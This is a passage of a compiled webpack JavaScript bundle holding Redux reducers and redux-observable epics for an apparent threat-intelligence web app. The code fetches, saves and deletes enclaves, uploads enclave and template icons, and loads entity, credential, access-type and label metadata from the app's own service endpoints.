    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* SAVE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["k" /* SAVE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* DELETE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["b" /* DELETE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_6_modules_icons_action_types_js__["c" /* SAVE_ENCLAVE_ICON_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_6_modules_icons_action_types_js__["b" /* SAVE_ENCLAVE_ICON_FAILURE */]:
      return false;
    default:
      return state;
  }
};
var queriedEnclavesLoading = function queriedEnclavesLoading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["g" /* FETCH_WITH_QUERY */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["i" /* FETCH_WITH_QUERY_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["h" /* FETCH_WITH_QUERY_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var loaded = function loaded() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["e" /* FETCH_FAILURE */]:
      return true;
    default:
      return state;
  }
};

var serialize = function serialize(state) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["pickImmutable"])(['colors'], state);
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  enclaves: enclaves,
  loading: loading,
  loaded: loaded,
  options: options,
  colors: colors,
  queriedEnclavesLoading: queriedEnclavesLoading,
  enclavesQueryResult: enclavesQueryResult
}));

/***/ }),
/* 2920 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export listToOrderedMap */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_features__ = __webpack_require__(181);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_enclave_utils__ = __webpack_require__(297);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_enclave_types_js__ = __webpack_require__(99);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__action_types_js__ = __webpack_require__(497);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_icons_action_types_js__ = __webpack_require__(177);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__templates_actions__ = __webpack_require__(714);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__actions__ = __webpack_require__(894);









var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:enclave:epics'); // eslint-disable-line no-unused-vars








var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_3_immutable__["fromJS"])(list).toOrderedMap().map(__WEBPACK_IMPORTED_MODULE_7_modules_enclave_types_js__["i" /* createEnclave */]).mapKeys(function (k, v) {
    return v.get('id');
  });
};

var formatQueryStringForRequest = function formatQueryStringForRequest(queryObject) {
  return queryObject ? new URLSearchParams(queryObject).toString() : '';
};

var fetchEpic = function fetchEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types_js__["d" /* FETCH */], __WEBPACK_IMPORTED_MODULE_8__action_types_js__["g" /* FETCH_WITH_QUERY */]).mergeMap(function (_ref2) {
    var type = _ref2.type,
        payload = _ref2.payload;


    // If a payload object is provided, it is a set of queryParams that are to be stringified and attacehd to the request
    return ajax.get(__WEBPACK_IMPORTED_MODULE_7_modules_enclave_types_js__["b" /* ENCLAVES_ENDPOINT */] + '/management' + (payload ? '?' + formatQueryStringForRequest(payload) : '')).debounceTime(250) // Adding a debouncer so frequent enclave filtering doesn't fire too many requests
    .map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(function (enclaves) {
      var isCommunityEnclaveEnabled = __WEBPACK_IMPORTED_MODULE_5_modules_features__["d" /* getters */].isFeatureEnabled(__WEBPACK_IMPORTED_MODULE_5_modules_features__["c" /* flags */].COMMUNITY_ENCLAVE_ENABLED)(store.getState());

      return isCommunityEnclaveEnabled ? enclaves : enclaves.filter(function (enclave) {
        return !Object(__WEBPACK_IMPORTED_MODULE_6_modules_enclave_utils__["f" /* isCommunityEnclave */])(enclave);
      });
    }).map(listToOrderedMap).map(function (enclaves) {
      return {
        type: type === __WEBPACK_IMPORTED_MODULE_8__action_types_js__["g" /* FETCH_WITH_QUERY */] ? __WEBPACK_IMPORTED_MODULE_8__action_types_js__["i" /* FETCH_WITH_QUERY_SUCCESS */] : __WEBPACK_IMPORTED_MODULE_8__action_types_js__["f" /* FETCH_SUCCESS */],
        payload: enclaves
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: type === __WEBPACK_IMPORTED_MODULE_8__action_types_js__["g" /* FETCH_WITH_QUERY */] ? __WEBPACK_IMPORTED_MODULE_8__action_types_js__["h" /* FETCH_WITH_QUERY_FAILURE */] : __WEBPACK_IMPORTED_MODULE_8__action_types_js__["e" /* FETCH_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var saveEnclaveEpic = function saveEnclaveEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types_js__["j" /* SAVE */]).mergeMap(function (_ref4) {
    var payload = _ref4.payload,
        meta = _ref4.meta;

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_7_modules_enclave_types_js__["b" /* ENCLAVES_ENDPOINT */], payload).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(__WEBPACK_IMPORTED_MODULE_7_modules_enclave_types_js__["i" /* createEnclave */]).mergeMap(function (enc) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types_js__["l" /* SAVE_SUCCESS */],
        payload: enc,
        meta: {
          alert: { type: 'success', text: payload.get('name') + ' enclave saved successfully.' }
        }
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types_js__["k" /* SAVE_FAILURE */],
        meta: {
          alert: { type: 'error', text: payload.get('name') + ' enclave could not be saved. Please reload this page and try again.' }
        }
      });
    });
  });
};

var saveEnclaveIconEpic = function saveEnclaveIconEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return (
    // first, consume a SAVE event, meaning an enclave is being saved
    action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types_js__["j" /* SAVE */]).switchMap(function (_ref6) {
      var meta = _ref6.meta;
      return (
        // wait until a the enclave is saved successfully
        action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types_js__["l" /* SAVE_SUCCESS */]).take(1).mergeMap(function (_ref7) {
          var payload = _ref7.payload;


          // dispatch a SAVE_ENCLAVE_ICON event, combining the enclave GUID
          // from the SAVE_SUCCESS event and the file from the SAVE event
          // Note --  SVG and regular icons updated in seperate calls
          var filesToSave = [];
          if (meta.file) filesToSave.push(meta.file);
          if (meta.sourceSVGFile) filesToSave.push(meta.sourceSVGFile);

          return filesToSave.length > 0 ? filesToSave.map(function (iconFile) {
            return Object(__WEBPACK_IMPORTED_MODULE_11__actions__["saveEnclaveIcon"])(payload.id, iconFile);
          }) : __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
        })
        // break the flow if the enclave fails to save
        .takeUntil(action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types_js__["k" /* SAVE_FAILURE */]))
      );
    })
  );
};

var deleteEnclaveEpic = function deleteEnclaveEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types_js__["a" /* DELETE */]).mergeMap(function (_ref9) {
    var id = _ref9.payload;

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_7_modules_enclave_types_js__["b" /* ENCLAVES_ENDPOINT */] + '/' + id).mergeMap(function (_ref10) {
      var response = _ref10.response;

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types_js__["c" /* DELETE_SUCCESS */],
        payload: id,
        meta: {
          alert: { type: 'success', text: 'Enclave deleted. Companies and users will no longer have access to it.' }
        }
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types_js__["b" /* DELETE_FAILURE */],
        meta: {
          alert: { type: 'error', text: 'Enclave could not be deleted. Please reload this page and try again' }
        }
      });
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchEpic, saveEnclaveEpic, saveEnclaveIconEpic, deleteEnclaveEpic));

/***/ }),
/* 2921 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(177);




var saveEpic = function saveEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return (

    // could be for an enclave or a template
    action$.ofType(__WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* SAVE_ENCLAVE_ICON */], __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* SAVE_TEMPLATE_ICON */]).mergeMap(function (_ref2) {
      var type = _ref2.type,
          payload = _ref2.payload;


      var isSVG = payload.file && payload.file.type.includes("svg");
      var path = void 0;
      var successEventType = void 0;
      var failureEventType = void 0;

      // set variables based on the type of object the icon is being associated with
      switch (type) {
        case __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* SAVE_ENCLAVE_ICON */]:
          path = 'enclaves';
          successEventType = __WEBPACK_IMPORTED_MODULE_1__action_types_js__["c" /* SAVE_ENCLAVE_ICON_SUCCESS */];
          failureEventType = __WEBPACK_IMPORTED_MODULE_1__action_types_js__["b" /* SAVE_ENCLAVE_ICON_FAILURE */];
          break;
        case __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* SAVE_TEMPLATE_ICON */]:
          path = 'enclave-templates';
          successEventType = __WEBPACK_IMPORTED_MODULE_1__action_types_js__["f" /* SAVE_TEMPLATE_ICON_SUCCESS */];
          failureEventType = __WEBPACK_IMPORTED_MODULE_1__action_types_js__["e" /* SAVE_TEMPLATE_ICON_FAILURE */];
          break;
        default:
          throw 'Unrecognized icon action type: ' + type;
      }

      var url = '/services/' + path + '/' + payload.guid + '/' + (isSVG ? 'icons-svg' : 'icons');

      // construct the form data that will hold the file
      var data = new FormData();
      if (isSVG) {
        data.append('svgIcon', payload.file);
        // TODO Color Support
      } else {
        data.append('icon', payload.file);
      }

      // ensure the file is not null
      if (payload.file == null) {
        throw 'Cannot upload, file is null.';
      }

      // post the file to the server
      var resp = ajax({
        method: 'POST',
        url: url,
        body: data,
        headers: { Accept: '*/*' },
        responseType: 'text'
      });

      // dispatch a success event with the iconUrl and the
      // guid of the resource it was associated with
      return resp.map(function (_ref3) {
        var response = _ref3.response;
        return {
          type: successEventType,
          payload: {
            iconUrl: response,
            guid: payload.guid
          }
        };
      }).catch(function (err) {
        return {
          type: failureEventType
        };
      });
    })
  );
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_observable__["combineEpics"])(saveEpic));

/***/ }),
/* 2922 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export entityTypes */
/* unused harmony export selectedEntityTypes */
/* unused harmony export credentialsTypes */
/* unused harmony export accessTypes */
/* unused harmony export labels */
/* unused harmony export subscriptionMethods */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(715);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();







var entityTypes = function entityTypes() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["i" /* FETCH_ENTITY_TYPES_SUCCESS */]:
      return payload;
    default:
      return state;
  }
};

/**
 * The entity types that are currently selected in the form UI
 *
 * NOTE: Default to non-custom entity types. In this context "standard" just
 * means the entity type is not custom.
 */
var selectedEntityTypes = function selectedEntityTypes() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Set"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      meta = action.meta;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["p" /* TOGGLE_ENTITY_TYPE */]:
      {
        var guid = payload.guid;

        return state.has(guid) ? state.delete(guid) : state.add(guid);
      }

    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["i" /* FETCH_ENTITY_TYPES_SUCCESS */]:
      {
        var standardEntityTypes = payload.filter(function (x) {
          return x.get('default');
        }).keySeq().toSet();
        var allEntityTypes = payload.keySeq().toSet();

        if (meta && meta.existingEntityTypes) {
          return allEntityTypes.intersect(meta.existingEntityTypes);
        } else {
          return standardEntityTypes; // See NOTE
        }
      }

    default:
      return state;
  }
};

var credentialsTypes = function credentialsTypes() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["f" /* FETCH_CREDENTIALS_TYPES_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).toMap().mapEntries(function (_ref) {
        var _ref2 = _slicedToArray(_ref, 2),
            k = _ref2[0],
            v = _ref2[1];

        var credentialsType = v.get('credentialsType');
        var credentials = v.mapKeys(function (k, v) {
          return k === 'credentialsType' ? 'value' : k;
        }).set('label', k);
        return [credentialsType, credentials];
      });
    default:
      return state;
  }
};

var accessTypes = function accessTypes() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_ACCESS_TYPES_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).toMap().mapEntries(function (_ref3) {
        var _ref4 = _slicedToArray(_ref3, 2),
            k = _ref4[0],
            v = _ref4[1];

        return [k, Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({ label: v, value: k })];
      });
    default:
      return state;
  }
};

var labels = function labels() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["l" /* FETCH_LABELS_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).toMap().mapEntries(function (_ref5) {
        var _ref6 = _slicedToArray(_ref5, 2),
            k = _ref6[0],
            v = _ref6[1];

        return [k, Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({ label: v, value: k })];
      });
    default:
      return state;
  }
};

var subscriptionMethods = function subscriptionMethods() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["o" /* FETCH_SUBSCRIPTION_METHODS_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])(payload.map(function (x) {
        return [x.value, Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(x)];
      }));
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  entityTypes: entityTypes,
  selectedEntityTypes: selectedEntityTypes,
  credentialsTypes: credentialsTypes,
  accessTypes: accessTypes,
  labels: labels,
  subscriptionMethods: subscriptionMethods
}));

/***/ }),
/* 2923 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils__ = __webpack_require__(2924);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_profile_getters__ = __webpack_require__(142);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_profile_action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__action_types_js__ = __webpack_require__(715);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__actions_js__ = __webpack_require__(1311);













var MISCELLANEOUS_ENDPOINT = '/services/miscellaneous';

var fetch = function fetch(action$, state$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6_modules_profile_action_types_js__["f" /* FETCH_SUCCESS */]).mergeMap(function () {

    var state = state$.getState();

    // fetch for all users
    var actions = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Set"])([Object(__WEBPACK_IMPORTED_MODULE_8__actions_js__["fetchLabels"])(), Object(__WEBPACK_IMPORTED_MODULE_8__actions_js__["fetchCredentialsTypes"])()]);

    // fetch for company admins
    if (Object(__WEBPACK_IMPORTED_MODULE_5_modules_profile_getters__["hasPermission"])('manage_company_users')(state)) {
      actions = actions.union(Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Set"])([Object(__WEBPACK_IMPORTED_MODULE_8__actions_js__["fetchAccessTypes"])()]));
    }

    // fetch for enclave managers
    if (Object(__WEBPACK_IMPORTED_MODULE_5_modules_profile_getters__["hasPermission"])('manage_enclaves')(state)) {
      actions = actions.union(Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Set"])([Object(__WEBPACK_IMPORTED_MODULE_8__actions_js__["fetchAccessTypes"])(), Object(__WEBPACK_IMPORTED_MODULE_8__actions_js__["fetchEntityTypes"])(), Object(__WEBPACK_IMPORTED_MODULE_8__actions_js__["fetchSubscriptionMethods"])()]));
    }

    // dedupe and convert to plain JS
    actions = actions.groupBy(function (x) {
      return x['type'];
    }).toSet().map(function (x) {
      return x.first();
    }).toJS();

    return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].concat(actions);
  });
};

var fetchEntityTypesEpic = function fetchEntityTypesEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["g" /* FETCH_ENTITY_TYPES */]).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('payload')).switchMap(function () {
    return ajax.get(MISCELLANEOUS_ENDPOINT + '/entity-types').map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('response')).map(__WEBPACK_IMPORTED_MODULE_4__utils__["a" /* entityTypeListToOrderedMap */]).map(function (x) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["i" /* FETCH_ENTITY_TYPES_SUCCESS */],
        payload: x
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["h" /* FETCH_ENTITY_TYPES_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var fetchCredentialsTypesEpic = function fetchCredentialsTypesEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["d" /* FETCH_CREDENTIALS_TYPES */]).mergeMap(function () {
    return ajax.get(MISCELLANEOUS_ENDPOINT + '/credentials-types').map(function (_ref3) {
      var response = _ref3.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["f" /* FETCH_CREDENTIALS_TYPES_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["e" /* FETCH_CREDENTIALS_TYPES_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var fetchAccessTypesEpic = function fetchAccessTypesEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["a" /* FETCH_ACCESS_TYPES */]).mergeMap(function () {
    return ajax.get(MISCELLANEOUS_ENDPOINT + '/access-types').map(function (_ref5) {
      var response = _ref5.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["c" /* FETCH_ACCESS_TYPES_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["b" /* FETCH_ACCESS_TYPES_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var fetchLabelsEpic = function fetchLabelsEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["j" /* FETCH_LABELS */]).mergeMap(function () {
    return ajax.get(MISCELLANEOUS_ENDPOINT + '/enclave-labels').map(function (_ref7) {
      var response = _ref7.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["l" /* FETCH_LABELS_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["k" /* FETCH_LABELS_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var fetchsubscriptionMethodsEpic = function fetchsubscriptionMethodsEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_7__action_types_js__["m" /* FETCH_SUBSCRIPTION_METHODS */]).mergeMap(function () {
    return ajax.get(MISCELLANEOUS_ENDPOINT + '/subscription-methods').map(function (_ref9) {
      var response = _ref9.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["o" /* FETCH_SUBSCRIPTION_METHODS_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_7__action_types_js__["n" /* FETCH_SUBSCRIPTION_METHODS_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_observable__["combineEpics"])(fetch, fetchEntityTypesEpic, fetchCredentialsTypesEpic, fetchAccessTypesEpic, fetchLabelsEpic, fetchsubscriptionMethodsEpic));

/***/ }),
/* 2924 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return entityTypeListToOrderedMap; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__types__ = __webpack_require__(1312);



var entityTypeListToOrderedMap = function entityTypeListToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(list).toOrderedMap().map(function (x) {
    return Object(__WEBPACK_IMPORTED_MODULE_1__types__["a" /* EntityType */])(x);
  }).mapKeys(function (k, v) {
    return v.get('guid');
  });
};

/***/ }),
/* 2925 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export templates */
/* unused harmony export options */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(498);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_modules_icons_action_types_js__ = __webpack_require__(177);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(344);











var templates = function templates() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["f" /* FETCH_SUCCESS */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["i" /* SAVE_SUCCESS */]:
      return state.set(payload.id, payload);
    case __WEBPACK_IMPORTED_MODULE_3_modules_icons_action_types_js__["f" /* SAVE_TEMPLATE_ICON_SUCCESS */]:
      var fieldToSave = payload.iconUrl.includes('.svg') ? 'iconSvgUrl' : 'iconUrl';
      return state.setIn([payload.guid, fieldToSave], payload.iconUrl);
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* DELETE_SUCCESS */]:
      return state.delete(payload);
    default:
      return state;
  }
};

var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_4__types_js__["b" /* Options */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["j" /* SET_DISPLAY_OPTIONS */]:
      return state.merge(payload);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["d" /* FETCH */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["g" /* SAVE */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* DELETE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["f" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["e" /* FETCH_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["i" /* SAVE_SUCCESS */]:
